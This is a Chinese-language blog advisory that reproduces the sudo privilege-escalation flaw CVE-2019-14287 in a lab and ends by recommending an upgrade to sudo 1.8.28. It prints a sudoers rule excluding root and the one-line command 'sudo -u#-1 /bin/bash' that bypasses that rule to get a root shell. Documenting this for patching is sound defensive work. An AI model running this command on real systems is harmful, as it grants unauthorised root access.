【漏洞预警】CVE-2019-14287/sudo提权漏洞复现-0x01 前言Sudo 的全称是“superuserdo”,它是Linux系统管理指令,允许用户在不需要切换环境的前提下以其它用户的权限运行应用程序或命令,通常是以 root 用...

七彩网络

关注WEB安全、网络安全
首页>> 安全通告 >>【漏洞预警】CVE-2019-14287/sudo提权漏洞复现

0x01 前言

Sudo 的全称是“superuserdo”,它是Linux系统管理指令,允许用户在不需要切换环境的前提下以其它用户的权限运行应用程序或命令,通常是以 root 用户身份运行命令,以减少 root 用户的登录和管理时间,同时提高安全性。


2019年10月14日,Sudo官方发布了Sudo 1.8.28版本,其中包含sudo root权限绕过漏洞的补丁修复,该漏洞编号为CVE-2019-14287。

0x02 漏洞复现

环境:

Linux parrot

Linux parrot 4.19.37-parrot1-amd64 #1 SMP Parrot 4.19.37-5parrot1 (2019-06-22) x86_64 GNU/Linux


前提,查看sudo版本,确定是否小于1.8.28

	sudo -V

编辑/etc/sudoers文件,增加对shungg账户设置的权限

	vi /etc/sudoers
	shungg  ALL=(ALL,!root) /bin/bash

Image

wq!   保存退出.

shungg用户登录执行

sudo -u#-1 /bin/bash

Image

漏洞利用成功。

0x03 修复建议

升级到最新版1.8.28

https://www.sudo.ws/alerts/minus_1_uid.html


×

感谢您的支持,我们会一直保持!

扫码支持
请土豪扫码随意打赏

打开支付宝扫一扫,即可进行扫码打赏哦

分享从这里开始,精彩与您同在

打赏作者
版权所有,转载注意明处:Shun's Blog - 致力于关注黑客技术、网络安全、WEB安全。 » 【漏洞预警】CVE-2019-14287/sudo提权漏洞复现
标签: CVE-2019-14287 sodu提权

发表评论

路人甲

网友评论(0)